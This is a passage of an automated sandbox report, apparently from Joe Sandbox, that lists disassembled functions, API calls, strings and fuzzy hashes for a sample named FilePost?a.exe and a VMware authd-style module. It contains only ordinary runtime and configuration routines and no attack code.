                                                    • SetLastError.KERNEL32(00000000,6CF77BEF,?,00000001,?,?,00000001,?,6CFB6BF0,0000000C,6CF77CE8,?,00000001,?), ref: 6CF7B527
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 756264d5a7b78d4636e5ac124e214a40a73852d0d2bad12075dfab79f1d87285
                                                    • Instruction ID: a626c0bb35e8e8ae480a1f0a107278ae784d8a704fc234e2b72bb31fce338851
                                                    • Opcode Fuzzy Hash: 756264d5a7b78d4636e5ac124e214a40a73852d0d2bad12075dfab79f1d87285
                                                    • Instruction Fuzzy Hash: 1601D83371A3125F9A751FB57C8DA973778EB0337C760072BF52045AE8EF6258055160
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    • C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe, xrefs: 6CF93ED5
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe
                                                    • API String ID: 0-457501829
                                                    • Opcode ID: d7d9f805d6e76997cd89e44f8eb301548635dbbb79f5381e759e79736dbfd060
                                                    • Instruction ID: 4f6570b9318bf88e238c5125a9d0297fa45aaab6298ba7fd2064f271f081a563
                                                    • Opcode Fuzzy Hash: d7d9f805d6e76997cd89e44f8eb301548635dbbb79f5381e759e79736dbfd060
                                                    • Instruction Fuzzy Hash: 5021F671609215BFEF189F669C84D9BB7BCEF0136C7044615F91E87A50E731DC1887A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2CED
                                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00ED2D00
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2D0B
                                                    Strings
                                                    • VMAuthdConfigGetLong: value %s for variable %s is invalid, xrefs: 00ED2D20
                                                    • config.ini, xrefs: 00ED2CC6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning_errno$freestrtol
                                                    • String ID: VMAuthdConfigGetLong: value %s for variable %s is invalid$config.ini
                                                    • API String ID: 145506635-3122803469
                                                    • Opcode ID: fdba20de556d628f9b3ca7c213e62ae8a2bb44b0604d9b492091e05c58f96057
                                                    • Instruction ID: 4693fdce68e9952685bbe73e0eafc438621488c8e4ffc5610471f1cf2e5c5558
                                                    • Opcode Fuzzy Hash: fdba20de556d628f9b3ca7c213e62ae8a2bb44b0604d9b492091e05c58f96057
                                                    • Instruction Fuzzy Hash: C4110831601208AFC720AF65EC45BAE77A8EF55711F0400AFF9056B391DB715E45C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B6F
                                                      • Part of subcall function 00ED2B60: Warning.VMWAREBASE(00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B7C
                                                      • Part of subcall function 00ED2B60: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,00EDB1EC,?,?,vmware-vmx-stats.exe,00000000,?,vmware-vmx-stats.exe), ref: 00ED2B84
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2D8D
                                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00ED2DA0
                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED2DAB
                                                    Strings
                                                    • config.ini, xrefs: 00ED2D66
                                                    • VMAuthdConfigGetULong: value %s for variable %s is invalid, xrefs: 00ED2DC0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning_errno$freestrtoul
                                                    • String ID: VMAuthdConfigGetULong: value %s for variable %s is invalid$config.ini
                                                    • API String ID: 3959447487-65099484
                                                    • Opcode ID: fec8aadbb953cd1fad9b87ceb5ab6e8ab7289a7465df29d6494cb2685053725f
                                                    • Instruction ID: 6471e76b8ec4d646b892ec128002f2c983146973b342debe658ca8c8f8e47a9d
                                                    • Opcode Fuzzy Hash: fec8aadbb953cd1fad9b87ceb5ab6e8ab7289a7465df29d6494cb2685053725f
                                                    • Instruction Fuzzy Hash: BC11E131601208AFC720AF69EC46BAE7BA8EF55711F0000AFF905AB391DB755E46C7E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8B05D: GetLastError.KERNEL32(?,?,?,6CF8D632,?,00000001,6CF83A72,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000), ref: 6CF8B062
                                                      • Part of subcall function 6CF8B05D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6CF8DAEC,00000001,?,?,?,6CF839A1,?,00000000,00000000,6CFB6E90,0000002C,6CF83A72), ref: 6CF8B100
                                                    • _free.LIBCMT ref: 6CF8CBE1
                                                    • _free.LIBCMT ref: 6CF8CBFA
                                                    • _free.LIBCMT ref: 6CF8CC38
                                                    • _free.LIBCMT ref: 6CF8CC41
                                                    • _free.LIBCMT ref: 6CF8CC4D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorLast
                                                    • String ID:
                                                    • API String ID: 3291180501-0
                                                    • Opcode ID: 6fac7c846a5551d5eff30999e4ca78523a7c51e2fbd837a3a3ab72db32ed4816
                                                    • Instruction ID: ed287ecc69981a86c493d1954ccc3e32b01d089be5c1ea054576065fb2703042
                                                    • Opcode Fuzzy Hash: 6fac7c846a5551d5eff30999e4ca78523a7c51e2fbd837a3a3ab72db32ed4816
                                                    • Instruction Fuzzy Hash: 28B16B75A02619DFDB24DF19C884B99B7B4FF09718F1046EAD84AA7750D731AE90CF80
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 6CF8FD6B: HeapAlloc.KERNEL32(00000000,00013385,00013385,?,6CF943D9,00000220,6CF8D246,00013385,?,?,?,?,00000000,00000000,?,6CF8D246), ref: 6CF8FD9D
                                                    • _free.LIBCMT ref: 6CF8C57A
                                                    • _free.LIBCMT ref: 6CF8C591
                                                    • _free.LIBCMT ref: 6CF8C5AE
                                                    • _free.LIBCMT ref: 6CF8C5C9
                                                    • _free.LIBCMT ref: 6CF8C5E0
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$AllocHeap
                                                    • String ID:
                                                    • API String ID: 1835388192-0
                                                    • Opcode ID: 2df9209defe952386f5c4df85d6338dd650f035222d51fc15e14429a4ea509f9
                                                    • Instruction ID: 4b9623a0bb7df552eee70c2900adff595bf6ec292303c79b8ea8316e5a5ed3bb
                                                    • Opcode Fuzzy Hash: 2df9209defe952386f5c4df85d6338dd650f035222d51fc15e14429a4ea509f9
                                                    • Instruction Fuzzy Hash: 2F51D532A02604EFDB11EF69DC41BAABBF4EF45728F14076AE905DBA90E731D901CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleclosesocket$free
                                                    • String ID:
                                                    • API String ID: 920023663-0
                                                    • Opcode ID: e6f9d85b25d7d98eba67bf99854758e63543b31e0d6e676997e6d10c8122535c
                                                    • Instruction ID: 943821db612db09328170e317dcd1c0c49a536fbb1e6b39f5523efb096719529
                                                    • Opcode Fuzzy Hash: e6f9d85b25d7d98eba67bf99854758e63543b31e0d6e676997e6d10c8122535c
                                                    • Instruction Fuzzy Hash: CDF0C2B55015106B86209F3AFC48A1AB3A8EF563397085237F879F32D0D730E99786E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                    • Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                    • Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED26C0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00ED2829,00EDA850,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED26C9
                                                      • Part of subcall function 00ED26C0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00EDA850,00000000,?,?,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED26E4
                                                    • SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastWarning$__acrt_iob_func__stdio_common_vfprintf_printf
                                                    • String ID:
                                                    • API String ID: 3351516144-0
                                                    • Opcode ID: 3a1e13a3a2040303111bd8051b89909bb573fa2bd5aaf1bcc950c488738777f6
                                                    • Instruction ID: afb1d4bedeb8b6925bc287694e3859231e1bdea95541ccdb16816248a01399fc
                                                    • Opcode Fuzzy Hash: 3a1e13a3a2040303111bd8051b89909bb573fa2bd5aaf1bcc950c488738777f6
                                                    • Instruction Fuzzy Hash: 02F0D67550124CAFDB11AF50DD46AEE33ECDF08305F4400A7FE04F6211DA709B869BA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(6CFDB368,00000000,?,6CF62074,6CFD9F48,6CF9E680,00000001), ref: 6CF77DE2
                                                    • LeaveCriticalSection.KERNEL32(6CFDB368,?,6CF62074,6CFD9F48,6CF9E680,00000001), ref: 6CF77E15
                                                    • RtlWakeAllConditionVariable.NTDLL ref: 6CF77E8C
                                                    • SetEvent.KERNEL32(?,6CFD9F48,6CF9E680,00000001), ref: 6CF77E96
                                                    • ResetEvent.KERNEL32(?,6CFD9F48,6CF9E680,00000001), ref: 6CF77EA2
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                    • String ID:
                                                    • API String ID: 3916383385-0
                                                    • Opcode ID: 5d3b0cb314b42ad87b1324993bd972d291f0c0700554adc495d238b29a9d2d6a
                                                    • Instruction ID: 84d15d51241c07612a126cd462db01c8de24828b8578c4c198760a358da5d576
                                                    • Opcode Fuzzy Hash: 5d3b0cb314b42ad87b1324993bd972d291f0c0700554adc495d238b29a9d2d6a
                                                    • Instruction Fuzzy Hash: 2001F635F21620DBDF859F28E849B997BB9EB0B711712445BF90687620CB316C00DF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free
                                                    • String ID: *?
                                                    • API String ID: 269201875-2564092906
                                                    • Opcode ID: 73d4f841bc70df50bfa6d55bf2e377d3ea8cedae22026cd6f06c591226949cf6
                                                    • Instruction ID: 4f2471d59aa73df7f487155dcb923ee6c47cf0ac5ea93b7d3ff7c3d897c9f579
                                                    • Opcode Fuzzy Hash: 73d4f841bc70df50bfa6d55bf2e377d3ea8cedae22026cd6f06c591226949cf6
                                                    • Instruction Fuzzy Hash: 64615F76D002199FEF14CFA9C8805DEFBF5EF49314B25816AD819E7740D731AE458B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(?,00000406,?,?,?), ref: 00ED39D9
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?), ref: 00ED3A21
                                                      • Part of subcall function 00ED39A0: WSAGetLastError.WS2_32(?,?,?,?,?,?), ref: 00ED3A2B
                                                      • Part of subcall function 00ED39A0: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?), ref: 00ED3A49
                                                      • Part of subcall function 00ED39A0: Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AD1
                                                      • Part of subcall function 00ED39A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED3AEE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$CloseErrorHandleLastObjectSingleWait
                                                    • String ID: %s$%3d %s$%3d-%s
                                                    • API String ID: 3663929458-2392319129
                                                    • Opcode ID: 753682546031ff4e49b6c1a649db4dd11e49e5fe5652e1ffe5f83e55969b7a03
                                                    • Instruction ID: b09ac5cb0f2b58e37f12327d224965fee439f2bf1de086f97e0eb814e90acd7f
                                                    • Opcode Fuzzy Hash: 753682546031ff4e49b6c1a649db4dd11e49e5fe5652e1ffe5f83e55969b7a03
                                                    • Instruction Fuzzy Hash: 95116A75500208DFDB10DF64CD51FA973A8EB44304F4051AAFB09AB382EB755A56CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,?,?), ref: 00ED81DE
                                                      • Part of subcall function 00ED8250: Warning.VMWAREBASE(00000001,?,00000000,?,00ED81F3,00000000,00000000), ref: 00ED825E
                                                    • Warning.VMWAREBASE([Ticket] Failed to get ticket dir in reap.,?,?,?,?,00000000), ref: 00ED822E
                                                      • Part of subcall function 00ED7CD0: Warning.VMWAREBASE(00ED8208,?,?,00000000,00000000,00ED8208,?,00000000), ref: 00ED7CFA
                                                      • Part of subcall function 00ED7CD0: Warning.VMWAREBASE([Ticket] Unable to open dir %s,00ED8208,00000000,00000000,00ED8208,?,00000000), ref: 00ED7D0F
                                                      • Part of subcall function 00ED7CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00ED8208,?,00000000), ref: 00ED7E34
                                                      • Part of subcall function 00ED7CD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E53
                                                      • Part of subcall function 00ED7CD0: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED7E85
                                                      • Part of subcall function 00ED7CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00ED7E8E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00ED820D
                                                    Strings
                                                    • [Ticket] Failed to get ticket dir in reap., xrefs: 00ED8229
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$_errno$_time64
                                                    • String ID: [Ticket] Failed to get ticket dir in reap.
                                                    • API String ID: 2503824821-659992124
                                                    • Opcode ID: 0f430352cf8f9aae470da581c505df160bc67945574924f0c2f087203173a81d
                                                    • Instruction ID: 92dda0aed25545cf3d9d7475ec397c8584e4a29f25266d8ae9e8c15f5d629564
                                                    • Opcode Fuzzy Hash: 0f430352cf8f9aae470da581c505df160bc67945574924f0c2f087203173a81d
                                                    • Instruction Fuzzy Hash: 4C01B535A411086FCB10ABA9ED06BEEBBA8DB45315F0410B7F909A7341DE314A19D6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __current_exception.VCRUNTIME140 ref: 00ED8834
                                                    • __current_exception_context.VCRUNTIME140 ref: 00ED8844
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED884B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: __current_exception__current_exception_contextterminate
                                                    • String ID: csm
                                                    • API String ID: 2542180945-1018135373
                                                    • Opcode ID: 79568928cb84ca8f18875abe0169c2d903c32db075f0e9679078ea4216b1f40a
                                                    • Instruction ID: 9a0922446f81a8f6d77eb9c1daceaf2dc4d1bfd9b78baf588ab8ffc84b01c364
                                                    • Opcode Fuzzy Hash: 79568928cb84ca8f18875abe0169c2d903c32db075f0e9679078ea4216b1f40a
                                                    • Instruction Fuzzy Hash: 61112A35A001198FCF48DF58D9809ADB7F2FF48304B589156E408AF352E734EC82DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __current_exception.VCRUNTIME140 ref: 00ED912F
                                                    • __current_exception_context.VCRUNTIME140 ref: 00ED9139
                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00ED9140
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: __current_exception__current_exception_contextterminate
                                                    • String ID: csm
                                                    • API String ID: 2542180945-1018135373
                                                    • Opcode ID: 3d1d2967018fffc7dd7f5239612227f13c30211aea480afc6b1b89040ee7cc8f
                                                    • Instruction ID: 6b114952d4ad2d1afaf78eb8a3f1fcdcb96b3ff0311acd4167fe660c08c30444
                                                    • Opcode Fuzzy Hash: 3d1d2967018fffc7dd7f5239612227f13c30211aea480afc6b1b89040ee7cc8f
                                                    • Instruction Fuzzy Hash: 1FF082355012069F8F307E299D0A01EB7ECEE11325B562417D448AB712CB20AD53C6D1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
